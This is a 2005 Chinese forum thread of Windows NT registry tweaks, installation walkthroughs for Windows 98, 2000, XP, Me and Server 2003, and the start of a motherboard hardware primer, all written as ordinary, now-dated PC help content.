  A、当镜像磁盘组中的驱动器发生故障时,系统自动向其余的驱动器发出发送数据请求,留下工作驱动器单独运行。此时,用户需要进入Disk Administrator,选择镜像组,再选择FaultTolerance/Break Mirror,将镜像组分为两个独立部分。

  B、工作的驱动器得到磁盘组所用的驱动器盘符,故障驱动器得到系统的下一个有效盘符。关闭NT Server,更换一个相同型号的硬盘驱动器。

  C、重新启动NT Server,运行Disk Administor,在新驱动器上选择分区和未用空间,选择Fault Tolerance/Establish Mirror即可对新驱动器作镜像。

  5、自定义启动信息

  每次当WINNT启动时,它都会显示“请按CTRL+ALT+DELETE键来登录”的信息,而如果你希望用户在按完CTRL+ALT+DELETE键后,画面上自动显示用户自己希望所看到的信息,可以通过如下的相关设置来进行:

  A、在开始菜单栏中选择运行命令,在随后打开的运行对话框里输入REGEDIT命令,从而打开注册表编辑器。

  B、在打开的注册表编辑器中,依次展开以下的键值:  [HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON]

  C、在编辑器右边的列表框中,选择“LEGALNOTICECAPTION”键值名称,如果没有上面的键值,可以利用“编辑”菜单中的“新建”键值命令添加一个,并选择所建数据类型为“REG_SZ”。

  D、选择指定的键值并双击,当出现“字符串编辑器”对话框时,在“字符串”文本框中输入用户希望看到的信息窗口的标题内容,例如输入“WINNT网络”。

  E、接着在下面一个“字符串”文本框中输入信息窗口要显示的具体内容,例如输入“欢迎使用WINNT网络”。

  F、重新启动计算机后,再次登录进WINNT网络时,用户将会看到自己在上面设置的内容。


6、加速文件管理系统缓存

  大家知道计算机的速度有很大一部分与内存相关,如果内存容量大一点,计算机运行速度就会相应快一点。但是假设在内存一定的情况下,如何来提高计算机的运行速度呢?这就是我们下面通过注册表设置要实现的内容,具体步骤如下:

  A、在开始菜单栏中选择运行命令,在随后打开的运行对话框里输入REGEDIT命令,从而打开注册表编辑器。

  B、在打开的注册表编辑器中,依次展开以下的键值:  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]。

  C、在编辑器右边的列表框中,选择“IoPageLockLimit”键值名称,如果没有上面的键值,可以利用“编辑”菜单中的“新建”键值命令添加一个,并选择所建数据类型为“DWORD”。

  D、选择指定的键值并双击,当出现“字符串编辑器”对话框时,在“字符串”文本框中输入用户需要的数值,系统默认缓存为512K,其他的参考值如下:

  RAM (MB) IoPageLockLimit  32  4096000  64  8192000  128  16384000  256+  65536000

  E、当用户重新启动计算机登录WINNT时,文件管理系统缓存将得到改善。

  7、增加“关闭系统”按钮

  在NT计算机中,“关闭系统”按钮作为缺省值在登陆对话框中提供,这个任务按钮允许用户不必先登陆即可关闭系统。在NT SERVER中虽然没有这个功能,但可以通过修改注册表,使系统在登陆对话框中增加一个“关闭系统”的按钮,具体操作方法如下:  

  A、打开注册表编辑器,并在编辑器中依次展开以下键值:  [HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON]。

  B、在编辑器右边的列表中用鼠标选择“SHUTDOWNWITHOUTLOGON”键值。

  C、接着用鼠标双击“SHUTDOWNWITHOUTLOGON”键值,编辑器就会弹出一个名为“字符串编辑器”的对话框,在该对话框的文本栏中输入数值“1”,其中0代表取消“关闭系统”按钮,1代表增加“关闭系统”按钮。

  D、退出后重新登录,在登录的界面中会增加一个“关闭系统”的按钮。

  8、在NT下创建一个镜像集

  A、先用Disk Administerator创建镜像集的第一个分区表,选中该分区,在另一个磁盘驱动器内的磁盘空间的未用区域上进行Ctrl+鼠标单击操作,以把未用的磁盘区域和第一个分区均选上。

  B、从Disk Ad ministor的Fault Tolerlance(容错)菜单中选中Establish Mirror(建立镜像 ),Disk Administor将在被选自由盘区外创建一个磁盘分区。该分区与原有分区一样大,并包含原分区表上所有数据的备份。

  C、如果要取消镜像集(并非删除镜像集),即仅仅停止两个分区之间的数据复制,只需从Disk Administor中选择Fault Tolerance/Break Mirror。



9、登录局域网超时自动断开

  在登录Windows NT网络时,有可能用户不小心输错了登录参数或其他原因,导致了登录网络可能需要花费好长时间,这种情况是我们不想看到的。为了解决这种问题,我们可以通过注册表,来配置为闲置超时断开,以分钟为单位,具体步骤为:

  A、打开注册表编辑器,并在编辑器中依次展开以下键值:  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]

  B、在编辑器右边的列表中用鼠标选择“AUTODISCONNECT”键值。

  C、接着用鼠标双击“AUTODISCONNECT”键值,编辑器就会弹出一个名为“字符串编辑器”的对话框,在该对话框的文本栏中输入数值“1”,其中0代表取消自动断开功能,1代表使用自动断开功能。

  D、退出后重新登录网络,上述功能就会生效。

  10、改变远程访问服务的缺省端口传输速度

  Windows NT远程访问服务为每个RAS串行端口设置两种BPS速度:载波BPS与联接BPS速度,前者是指两个Modem通过电话线传输数据的速度,后者则指Modem与主机串口间的数据传输速度;当远程服务被启动时,计算机首先将其联接BPS速度值存放于\System Root\\System32\RAS\Modem.INF文件中,以MAXC ARRIERBPS参数形式存放,然后将该值保存在RASSERIAL.INF文件中,以后每次进行传输时对串口作初始化,只需改变SERIAL.INI文件,即可改变串口传输速度,具体操作方法如下:

  A、将SERIAL.INI文件用编辑器打开。

  B、将INITIALBPS参数改为自己所希望的数值。

  C、将上述改动保存成一个文件,文件名仍为SERIAL.INI。

  D、打开“开始”菜单,并单击“运行”命令,在运行栏中输入RasAdmin命令。

  E、从服务器菜单中选择“Stop Remote Access Service”,再选择“Start Remote Access Service”,上述设置就会生效。 自动检测慢网登陆

  上面我们曾经说过,在登录NT网络时有可能很慢。同样地,如果Windows NT检测速度有困难,可以取消。具体实现步骤为:

  A、打开注册表编辑器,并在编辑器中依次展开以下键值:

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

  B、在编辑器右边的列表中用鼠标选择“SlowLinkDetectEnabled”键值,如果没有该键值,必须新建一个DWORD值,名称设置为“SlowLinkDetectEnabled”。

  C、接着用鼠标双击“SlowLinkDetectEnabled”键值,编辑器就会弹出一个名为“字符串编辑器”的对话框,在该对话框的文本栏中输入数值“1”,其中0代表取消自动检测慢网登陆功能,1代表使用自动检测慢网登陆功能。

  D、退出后重新登录网络,上述设置就会起作用。


12、加快网络传输速度

  对于拨号用户来说,时间就是金钱,怎样才能节约时间,节省金钱呢?回答是提高网络传输速度。那又如何提高网络传输速度呢?大家知道,网络速度主要是受网络带宽限制的。增加带宽不是拨号用户所能做到的,他们唯一能做的就是把调制解调器的传输速度能够再提高一点。其实拨号用户还可以从计算机本身运行速度出发,尽量能挖掘计算机在网络加速方面最大的潜能。下面我们就通过一些设置来尽量加快网络传输速度,具体设置如下:

  A、在开始菜单栏中选择运行命令,在随后打开的运行对话框里输入REGEDIT命令,从而打开注册表编辑器。

  B、在打开的注册表编辑器中,依次展开以下的键值:  [HKEY_LOCAL_MACHINE\System\Current Control Set\Services\Class\NetTrans00n ],其中n表示个别拔号网络连接项号码。

  C、在编辑器右边的列表框中,选择“MaxMTU”键值名称,如果没有上面的键值,可以利用“编辑”菜单中的“新建”键值命令添加一个,并选择所建数据类型为“DWORD”值。

  D、选择指定的键值并双击,当出现“字符串编辑器”对话框时,在“字符串”文本框中输入“576”,576代表最大传输单元值。

  E、接着在编辑器菜单栏中依次选择“编辑”→“新增”→“字符串值”,右边列表窗口就会多出一个新字符串,把它 命名为“MaxSSS”,再双按这个字符串值并把它设定为“536”。

  F、重新返回到编辑器的主操作界面,并依次展开如下键值: [HKEY_LOCAL_MACHINE\System\Current Control Set\Services\VxD\MSTCP]。

  G、按照上述同样的操作方法,在编辑器右边的列表中依次添加字符串值“DefaultRcvWindow”、 “DefaultTTL”,并且把它们的数值分别设置为“2144”,“64”。

  H、当用户重新启动计算机登录WINNT时,上述所有的设置将会生效,这样计算机将会发挥它在网络加速方面最大的能量。   

  13、自动登陆网络

  通常情况下,用户在进入WINNT网络之前必须输入自己的用户名称以及口令。但是WINNT也提供了启动时自动以某一个组的用户名称和口令进行访问WINNT,而不需要通过人工设置的方法来输入登陆网络的参数。要实现自动登陆功能,必须要进行如下配置:

  A、打开注册表编辑器,并在编辑器中依次展开以下键值:

  [HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENT VERSION\WINLOGON]

  B、用鼠标单击右边的“AUTOADMINLOGON”键值名称,编辑器就会弹出一个名为“字符串编辑器”的对话框,在该对话框的文本栏中输入数值“1”。

  C、接着再用鼠标选择右边的“DEFAULTDOMAINNAME”键值名称,并在随后弹出的文本栏中输入所要登陆的域名名称或所要访问的计算机名称,例如输入“DOMAIN”域或“COM”计算机名称,然后单击“确定”按钮。

  D、按照同样的操作方法,选择右面的“DEFAULTUSERNAME”键值名称,并在“字符串”文本框中输入登陆网络的用户名称,例如输入管理员名称“ADMINISTRATOR”,并单击“确定”按钮。

  E、最后在注册表编辑器中,用鼠标单击“编辑”菜单并在下拉菜单中选择“新建键值”命令,然后在注册表右边的列表中,输入键值名称为“DEFAULTPASSWORD”,键值类型为“REG_SZ”,接着单击“确定”按钮。

  F、 用鼠标双击“DEFAULTPASSWORD”键值,在弹出的对话框中输入用户的密码,在这里我们输入系统管理员的口令作为登陆网络的密码,输入完成后单击“确定”按钮结束设置工作。

  G、 让计算机重新启动,缺省设置的用户将会自动登陆到指定的网络中去。

  如果用户日后不再需要自动登陆功能时,只需要把“AUTOADMINLOGON”的键值改为数值“0”即可。



14、禁止光盘的自动运行功能

  大家都很清楚每当光盘放到计算机中时,WINNT就会执行自动运行功能,光盘中的应用程序就会被自动运行,而我们在实际工作中有时不需要这项功能,那么如何屏蔽该功能呢。此时,我们同样可以修改注册表使此功能失效,具体做法如下:

  A、打开注册表编辑器,并在编辑器中依次展开以下键值:  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom] 。

  B、在编辑器右边的列表中用鼠标选择“AUTORUN”键值。

  C、接着用鼠标双击“AUTORUN”键值,编辑器就会弹出一个名为“字符串编辑器”的对话框,在该对话框的文本栏中输入数值“0”,其中0代表“禁用”光盘的自动运行功能,1代表“启用”光盘的自动运行功能。

  D、设置好后,重新启动计算机就会使上述功能有效。

  15、取消系统检测串口,提高NT系统启动速度

  计算机每次启动都会对计算机的硬件要重新检测一遍,这需要花费一定的时间,也因此就减慢了计算机的启动速度。在这里笔者向大家介绍一下通过一些设置来取消系统检测串口,从而达到提高NT系统启动速度的目的,具体步骤如下:

  A、在开始菜单中,用查找的方法将Boot.INI文件找出来,然后将该文件的“只读”属性屏蔽掉,以便于我们在其中进行一些相关改动。

  B、接着用一个文本编辑器将Boot.INI文件打开,并修改[operating system]段的内容,将其中每一行后加上NoserialMice参数,如下所示:

  修改Boot.INI文件,

  ……

  [operating system]

  multi(0) disk(0) rdisk(0)

  partition(1)\WINNT40="Windows NT

  Workstation Version4.0"/NoSerialMice  ……

  C、把上述修改的内容保存起来,文件名仍为Boot.INI。

  D、退出Windows NT,重新启动计算机后上述配置就会生效。
鱼溺水而亡,是为了让大海能够记住他~
35楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:50   |  只看该作者   |  转账至  82622206

安装WINS

用启动盘或安装光盘进入DOS:

分好区以后,我们开始安装系统了。具体操作是开机时按del,进入cmos中,在第二项bios  advance feturu中的first boot设为floppy后按f10保存,插入启动盘重起既可;如果用光盘,把floppy改成CD-ROM即可


1.首先,由于我们的计算机只有DOS操作系统,因此,我们必须在DOS下安装Windows。进入DOS后,转到您要安装WINDOWS98的目录盘下(一般为C盘),系统默认的盘符一般也是C盘,如果您进入DOS后还没有进行任何操作的话,那么就可以直接进行安装了。在确定格式化C盘以后转到WINDOWS98的安装盘所在的目录下,应该为我们的光驱所在的目录,直接在盘符后敲SETUP回车即可开始安装。

2.然后便会出现“欢迎安装WINDOWS98”界面。可以看到左边是安装的进度显示,目前处在“WINDOWS98安装程序将开始运行”——WINDOWS98安装程序的第一部分。

3.用鼠标单击“继续”按钮,WINDOWS98安装程序便开始对系统和驱动器进行常规检查,一切正常的话按“继续”按钮,WINDOWS98开始准备“安装向导”。自此,你可以让计算机自己操作,一切进展情况可以从屏幕中的进度条中了解。此间大约需要2分钟。

4.现在,屏幕上又会出现“软件许可协议”对话框,点选“接受协议”方可进行“下一步”,否则安装不能进行。

5.紧接着,出现了“产品密钥”输入框,你可从磁盘中附有的说明书中找到WINDOWS 98的序列号,输入无误后单击“下一步”按钮。

6. 好了,现在WINDOWS98安装程序进入第二部分:“正在收集计算机的相关信息”。WINDOWS98对系统进行检查,确保有足够的硬盘空间来安装WINDOWS 98。

7.接着系统会让你选择安装目录(默认为系统所选择的目录),然后是一些安装组件的对话框。推荐安装方式将安装最常用的系统组件,最合适初学安装操作系统的初学者。自定义安装方式,可由用户自行选择安装组件的内容、范围等,适合有一定经验的用户。一般来说选择“典型”安装方式,完全安装WINDOWS98需要200M左右硬盘空间。

8.安装方式设定后,系统出现设定用户姓名与单位,按个人意愿进行输入即可。

9.点击下一步,系统弹出用户区域选择窗口,区域的选择主要是确定操作系统的系统时间及日期,选择中国,点击下一步。

10.系统弹出提示窗口,询问用户是否创建启动盘,对于电脑初学者,建议创建一张启动盘,因为启动盘非常重要,它是发生某些问题时修复系统的启动文件必备工具。把软盘插入软驱,点击确定。

11.接下来系统进入文件复制阶段,整个过程都是自动化的安装方式,用户可以不用操心任何事!

12.文件复制完成后,系统弹出一个提示重新启动计算机的窗口,可以点击按钮,也可以等待15秒,让系统自动重新启动。

13.重新启动计算机之后,系统将自动进行各个项目的安装,不过还会弹出一个调整时区的窗口,由于之前选择的区域为中国,点击确定继续安装,其它事情无须插手。

14.系统自动设置完毕之后,计算机将再次重新启动,系统也将自动进行最后的个人信息设置。

15.当系统又重新启动时,你就可以进入Windows 98操作系统,同时看到微软的友好界面-“欢迎进入Windows 98”。到此,整个Windows 98安装工作就完成了!


DOS下安装98

在DOS下的安装时,先用启动盘或安装光盘引导至DOS下,假设光驱为E盘,安装目录是E盘的win98,操作方法如下:


A:\>E:
E:\>cd win98
E:\win98> setup.exe



安装Windows 2000


前面我们已经安装了Windows 98 系统,那么在Windows 98 系统的基础上,我们再来学习一下如何安装Windows 2000:

在Windows 98 系统中,插入Windows 2000光盘,由于光盘是自动运行的,所以直接弹出安装的初始界面,系统会问我们是否升级到Windows 2000,在此,我们不选择升级到 Windows 2000 中,点击“否”按钮,返回安装对话框,并且点击“安装 Windows 2000”,开始安装。

1. 安装程序弹出协议对话框,询问是否接受协议,接受,进入下一步,不接受,退出安装。毫无疑问,我们选择了接受协议,然后点击“下一步”。

2. 到了此步,安装程序进行检测系统,并作复制必要的安装文件到 C 盘和其它临时目录,15秒后电脑重新启动。

3. 电脑重新启动后,进入WINDOWS2000 SERVER 安装界面。安装程序有三个选择项:
a) 要开始安装WIN2000,按ENTER
b) 要修复WIN2000,按R
c) 要停止WIN2000并退出安装程序,按F3

4. 我们按回车选择第一个选项,程序进入安装目录选择窗口,确定需要安装的盘符。如果希望用硬盘尚未划分的磁盘分区来安装 Windows 2000,请按键盘上的 C 字母,如果想删除高亮显示的磁盘分区请按键盘上的 D 键。我们按了回车,选择了 C 盘。

5. 程序进入下一个窗口,提示选择文件系统的格式,下面把它们都列了出来,共有三种:
a) 用FAT文件系统格式化磁盘分区
b) 将磁盘分区转换为NTFS
c) 保持现有文件系统(无变化)---默认

6. 如果发觉选择的磁盘分区不对,请按 ESC键返回上一步。由于 NTFS 是 NT 系列平台运行最高效率的磁盘文件系统格式,因此在第一个选项高亮时按了回车。Windows 2000 将会花几分钟检查磁盘空间,确保有足够空间安装 Windows 2000。

7. 将文件复制到Windows 2000安装文件夹中---等待一段时间后,安装所需要的文件都复制完毕,这时,我们就可以来到下一个步骤了。

8. 安装程序初始化 Windows 2000 配置后,重新启动电脑,重启后可看到 WIN2000 安装程序进行各项检测。接下来,安装程序底部安装的区域设置,默认系统区域和用户区域设置均为(中国)。键盘布局也默认为中文(简体)--美式键盘键盘布局。若要进行修改,可自定义进行设置。安装程序进入一个要求您输入个人信息,包括姓名及公司或单位的名称的窗口。填写计算机名:安装程序提供了文字输入确定用户的计算机名和其它的设置。

9. 在此,需要声明的是:安装程序会创建一个称为Administrator(系统管理员的)用户帐户,它拥有完全控制计算机的权限。确定这个帐户时,安装程序要求用户输入“系统管理员密码”和“确认密码(即再次输入)”。然后,用鼠标点击“下一步”后,安装程序弹出了日期和时间的设置对话框,确定之后按回车。

10. 到此,系统出现网络设置对话框,共有两个选项,分别是“典型设置”和“自定义设置”, 对于安装操作系统的生手,建议选择“典型设置”,让安装程序实现傻瓜式的操作,避免安装过程中设置出错。

11. Windows 2000 是基于NT内核的,网络对它来说最为重要,所以系统弹出了域成员设置对话框。然后执行最后任务,也就是安装程序花几分钟时间进行安装与配置 WIN2000 组件。此时不再需要用户进行操作,完成是由 Windows 2000 所提供的。

至此,安装工作就大功告成了!最后单击“完成”,重新启动计算机,当再次进入 Windows 2000 时,你就会发现它的魅力!感受到它的功能强大!
如果之前已经安装好了 Windows 2000,但有些必须的内容补充进来,那么在第2个步骤时“选WIN2000组件的安装”。步骤同上。

Windows XP 的安装

Windows XP在升级安装上做得十分出色,它的安装方式同样有三种:升级安装、双系统共存安装和全新安装。我们可在以前的Windows 98/98 SE/Me/2000这些操作系统的基础上顺利升级到Windows XP。Windows XP的核心代码是基于Windows 2000的,所以从Windows 2000上进行升级安装自然十分容易。

下面我们就来介绍一下Windows XP的安装。

1. 在WINDOWS状态下放入光盘自动运行,讯问是否安装WINXP,用鼠标选择“Install Windows XP”。

2. 选框里面可以选“升级(推荐)”和“新安装(高级)”。当语言版本不一致时,不能用“升级”,只能新安装。新安装不存在系统兼容性问题。

3. 接受协议,输入注册码。

4. 选择可支持其它东亚语种(Install support for East Asian languages),当然也包括中文。语种选择“Chinese(PRC)”。

5. 点击第5步中的"Advanced Options"选项.

6. 在"Copy installation files from this folder"所要求的文本框中输入安装的源目录;

7. 在"To this folder on my hard drive"所要求的文本框中输入安装的目标目录,注意目标目录没有带驱动器号。如果想自己选安装在哪个驱动器号上,勾选下面的"I want to choose the install drive letter and partition during Setup"。

8. "Copy all installation files from the Setup CD"是把安装盘上的文件拷贝到硬盘上。用光盘安装时它一般不会把安装源文件整个拷贝到硬盘,而是在安装时建立拷贝的文件列表,按列表拷贝。

9. "I want to choose the install drive letter and partition during Setup"用于改变WINXP安装目录。

10. 第5步中的"Accessibility Options"选项,即辅助选项(残疾人专用)。
a) 选择"Use Microsoft Magnifier during Setup"是"使用微软放大镜",字体会显示得很大。
b) 选择"Use Microsoft Narrator during Setup"是"使用微软讲述者",每步都有英文的语音提示,很清晰。

11. 重启后,选择“TO set up Windows XP now,press ENTER”,即安装WINXP。

12. 磁盘格式转换,选择"To convert the drive to NTFS,press C"即可将FAT(或FAT32)磁盘格式转换成NTFS格式,确认转换敲“C”。选择"To select a different partition for Windows XP,press ESC"可重新选分区(敲“ESC”)。

13. 进入安装,正在复制文件,显示复制文件的进度。

14. 文件复制完毕,进入磁盘格式转换,磁盘的格式被转换成NTFS。转换完毕后会重新启动一次,比不转换磁盘格式多一次重启。启后进行检测,并可见XP界面。

15. 选择“区域和语言”。在安装英文版XP又想让它支持中文时,这个画面的选项比较重要。
a) 上方的提示:将“标准和格式”设置为“英语(美国)”,“位置”设置为“美国”。如果想让英文的XP支持中文(在不装中文包的前提下),就要点“Customize”,然后把“标准和格式”设置成“Chinese Simplified(China PRC)”,位置设置成“China”。
b) 中间的提示:文本输入默认语言和方法是美式键盘。如果要查看或改变,点“Details”,选中“为东亚语言安装文件”,英文XP才可以支持中文,上面的“区域和语言”里才可以选“中国”和“中文”。

16. 输入名字和公司/组织名,注册时用。以后在右键点“我的电脑”并选“属性”时可以看到这些信息。

17. “文字和输入语言”设置页,用于设置语言和输入法。

18. 输入计算机名和系统管理员密码。XP正常启动时不使用管理员登录,只在“安全模式”时才出现(安全模式只有系统管理员才可以登录)。

19. “日期和时间”设置:下面的下拉选框是选时区,在中国应该选“(GMT +08:00)北京 重庆 乌鲁木齐”。

20. 网络设置:一般选“Typical settings(典型设置)”。如果需要其他协议如IPX、NetBEUI等,则点下面的“Custom settings(自定义)”。这个可以在以后的网络属性里改,并不需要在这里设置。

21. 安装所选定的安装组件、帮助文件等等,以及安装[开始]菜单项目、注册组件、保存设置、删除用过的临时文件。重新启动后,进入WINXP的炫丽画面(需要设置WINDOWS XP)。

22. 注册。一般选“现在不注册”。

23. 输入使用这台计算机的用户名,这将出现在登录时的列表中。也可以在系统安装完毕后,在“控制面板—用户帐户”里添加。这里输入的用户名都有系统管理员的权限,而且没有密码,还需在“用户帐户”里创建密码和更改权限。至少应输入一个。建议只输入一个,以后再添加。

至此,安装全部完成!

DOS下安装XP

在DOS下的安装时,先用98启动盘引导至DOS下,注意不能像安装Windows98一样,直接敲入setup.exe就完事,而是需要先加载smartdrv.exe,然后运行i386目录下的winnt.exe。smartdrv.exe这个文件在windows9x的安装光盘中或是在Windows9x系统的windows目录下。假设smartdrv.exe这个文件已经拷贝到A盘,光驱为I盘,操作方法如下:

A:\>smartdrv.exe
A:\>I:
I:\>cd i386
I:\i386>winnt.exe

【特别注意】一定要记住加载smartdrv.exe。不然,等上一个晚上也未必能安装完Windows XP这个家伙,呵呵。


安装Windows Me

首先确认你的硬盘分区格式为FAT32,如为FAT16,请转换为FAT32格式,因为安装Windows Me系统必须是这种格式。

Windows Me提供了三种安装方式,分别是:

1. 用启动盘启动计算机,进入安装目录,执行Setup程序。

2. 用Windows Me光盘启动,自动执行安装程序。

3. 在当前的操作系统中运行Windows Me的安装程序,但必需你当前的操作系统的代码页和你将要安装的Windows Me的代码页相同,简而言之就是在Windows98中文版下不能安装Windows Me英文版。

无论采用哪一种方式,接下来我们将面对的就是我们刚才介绍过的类似于Windows98的安装界面,你大可以随着屏幕的提示按几个健,选择是升级安装,还是全新安装……至于具体的过程(和Windows98一样)我们就不再多说了。注意在安装系统过程中最好选择自定义安装,只安装你所需要的程序。



Windows 2003是微软公司开发的新一代网络服务器操作系统,与以前的同类操作系统相比,它更加安全、性能更加稳定,而操作和使用却更加轻松,因此,它不仅能够安装到服务器上设置成为主域控制服务器、文件服务器等各种服务器,也能安装在局域网的客户机上,作为客户端系统使用,当然也可以安装到个人电脑中,成为更加稳定、更加安全、更容易使用的个人操作系统。无论是服务器、客户机还是家庭用户,安装Windows2003都是非常轻松的。

一、系统配置需求

虽然这是微软最新推出的操作系统,但它对系统硬件的要求并不是很高,建议系统的CPU主频不低于550MHz(支持最低主频为133MHz);建议系统内存在256 MB以上(最小支持128 MB,最大支持 32 GB);硬盘分区要具有足够的可用空间,最小要在2G以上; VGA 或更高分辨率的监视器(建议使用 SVGA 800x600 或更高)、键盘和鼠标;对于大多数用户来说,由于要通过光驱来安装操作系统,所以用于读取安装光盘的CD-ROM或者DVD-ROM是必不可少的。

如果您的计算机符合最低配置,即可确定将Windows 2003安装到计算机中。

二、系统的安装

首先在启动计算机的时候进入CMOS设置,把系统启动选项改为光盘启动,保存配置后放入系统光盘,重新启动计算机,让计算机用系统光盘启动。

启动后,系统首先要读取必须的启动文件,。接下来询问用户是否安装此操作系统,按回车确定安装,按R进行修复,按F3键退出安装.


这时,我们必须按下回车键确认安装,接下来出现软件的授权协议,必须按F8键同意其协议方能继续进行,下面将搜索系统中已安装的操作系统,并询问用户将操作系统安装到系统的哪个分区中,如果是第一次安装系统,那么用光标键选定需要安装的分区。

选定分区后,系统会询问用户把分区格式化成哪种分区格式,建议格式化为NTFS格式;对于已经格式化的磁盘,软件会询问用户是保持现有的分区还是重新将分区修改为NTFS或FAT格式的分区,同样建议修改为NTFS格式分区。选定后按回车,系统将从光盘复制安装文件到硬盘上。当安装文件复制完毕后,第一次重新启动计算机。

系统重新启动后,即进入窗口界面,开始正式安装。在安装过程中,由于系统要检测硬件设备,所以屏幕会抖动几次,这是正常的。

在安装过程中,有几步需要用户参与。第一次是系统语言、用户信息的配置,一般说来,只要使用默认设置即可,直接点击“下一步”按钮即可进行。

下面输入用户的姓名和单位名称,输入完毕后点击“下一步”按钮继续。

接下来输入软件的序列号,在光盘的封套或者说明书中找到这个序列号,输入到“产品密钥”输入框中,点击“下一步”继续。

第二次是关于网络方面的设置,对于单机用户和局域网内客户端来说,直接点击“下一步”按钮继续即可,但对于服务器来说,要设置此服务器供多少客户端使用,此时需要参考说明书的授权和局域网的实际情况,输入客户端数量。设置完毕后,点击“下一步”继续。

下面是设置计算机的名称和本机系统管理员的密码,计算机的名称不能与局域网内其他计算机的名称相同,管理员的密码设置要安全,最好是数字、大写字母、小写字母、特殊字符相结合,然后点击“下一步”继续。

下面是系统关于网络的设置,在这里可以选择“典型设置”,在安装完毕后再进行调整。

在设置工作组或计算机域的时候,不论是单机还是局域网服务器,最好是选中第一项,当把系统安装完毕后再进行详细的设置。

设置完毕后,系统将安装开始菜单项、对组件进行注册等进行最后的设置,这些都无需用户参与,所有的设置完毕并保存后,系统进行第二次启动。

第二次启动时,用户需要按“Ctrl+Alt+Del”组合键,输入密码登录系统。

进入系统之后,将自动弹出一个“管理您的服务器”窗口。这里需要根据自己的需要进行详细配置。

对于服务器来说,点击“添加角色到您的服务器”右侧的“添加或删除角色”按钮,首先进行的是预备步骤,在此要确认安装所有调整解调器和网卡、连接好需要的电缆,如果要让这台服务器连接互联网,要先连接到互联网上,打开所有的外围调协,如打印机、外部的驱动器等,然后点击下一步按钮进行详细配置,在“服务器角色”中选定某项,然后“点击”下一步按钮即可对其进行配置,可供配置的内容如文件服务器、打印服务器、IIS服务器、邮件服务器、域控制器、DNS服务器、DHCP服务器等,但如何配置这些服务器已经不是本文的讨论范围了,此处不再进行详细的配置介绍。

对于局域网内的客户机来说,需要配置的并不是服务器,而是如何将本机添加到网络中。通过“开始”菜单/“控制面板”/“系统”命令打开配置窗口,点击“计算机名”标签页,点击“更改”按钮,如图15所示,输入自己的计算机名,然后在下方选择自己的计算机是隶属于域还是工作组,之后点击确定按钮。在加入域时,需要在域控制器中建立一个帐号,然后在添加到域的过程中输入帐号和密码即可。

在局域网中,每台计算机都要有自己的IP地址,在Windows 2003中设置IP地址与之前的操作系统基本相同:在控制面板中右击网络连接,选择“属性”命令,选中“Internet协议(TCP/IP)”,点击“属性”按钮,选定“使用下面的IP地址”,然后输入适当的IP地址和子网掩码、默认网关、DNS服务器等内容,点击确定按钮。

以上是针对局域网用户而言的必要设置,对于单机用户来说,无需设置这些网络属性,只要系统安装完毕,就基本上安装完成了。而且由于它是最新的操作系统,所以绝大多数硬件设备的驱动程序也都安装了,用户所做的只是对系统进行必要的调整而已,如调整显示分辨率、屏幕刷新频率等,然后安装必要的应用软件就可以开始工作了。
鱼溺水而亡,是为了让大海能够记住他~
36楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:45   |  只看该作者   |  转账至  82622206

硬件知识大全

主板

之所以把这东西放在第一位,是因为作为它太重要。
我们常见的主板是ATX主板。它是采用印刷电路板(PCB)制造而成。是在一种绝缘材料上采用电子印刷工艺制造的。市场上主要有4层板与6层板二种。常见的都是4层板。用6层PCB板设计的主板不易变形,稳定性大大提高。如果你有幸买到了6层板,那可绝对超值啊!哈!在主板的每层都布满了电路,所以,如果PCB板烧坏,比较轻的凭借我们工程师高超的技术,可以通过搭明线维修,比较严重的话,这片主板的生命也就到此结束了!
主板上面的零件看起来眼花缭乱,可他们都是非常有条有理的排列着。主要包括一个CPU插座;北桥芯片、南桥芯片、BIOS芯片等三大芯片;前端系统总线FSB、内存总线、图形总线AGP、数据交换总线HUB、外设总线PCI等五大总线;软驱接口FDD、通用串行设备接口USB、集成驱动电子设备接口IDE等七大接口。
一、主板上的主要芯片
1、 北桥芯片 MCH 在CPU插座的左方是一个内存控制芯片,也叫北桥芯片、一般上面有一铝质的散热片。北桥芯片的主要功能是数据传输与信号控制。它一方面通过前端总线与CPU交换信号,另一方面又要与内存、AGP、南桥交换信号。北桥芯片坏了以后的现象多为不亮,有时亮后也不断死机。如果工程师判定你的北桥芯片坏了,再如果你的主板又比较老的话,基本上就没有什么维修的价值了
2、 南桥芯片 ICH4 南桥芯片主要负责外部设备的数据处理与传输。比ICH4早的有ICH1、ICH2、ICH3,但它不支持USB2.0 。而ICH4支持USB2.0 。区分它们也很简单:南桥芯片上有82801AB 82801BB 82801CB 82801DB 分别对应ICH1 ICH2 ICH3 ICH4 。南桥芯片坏后的现象也多为不亮,某些外围设备不能用,比如IDE口、FDD口等不能用,也可能是南桥坏了。因为南北桥芯片比较贵,焊接又比较特殊,取下它们需要专门的BGA仪,所以一般的维修点无法修复南北桥。
3、 BIOS芯片 FWH 它是把一些直接的硬件信息固化在一个只读存储器内。是软件和硬件之间这重要接口。系统启动时首先从它这里调用一些硬件信息,它的性能直接影响着系统软件与硬件的兼容性。例如一些早期的主板不支持大于二十G的硬盘等问题,都可以通过升级BIOS来解决。我们日常便用时遇到的一些与新设备不兼容的问题也可以通过升级来解决。如果你的主板突然不亮了,而CPU风扇仍在转动,那么你首先应该考虑BIOS芯片是否损坏。
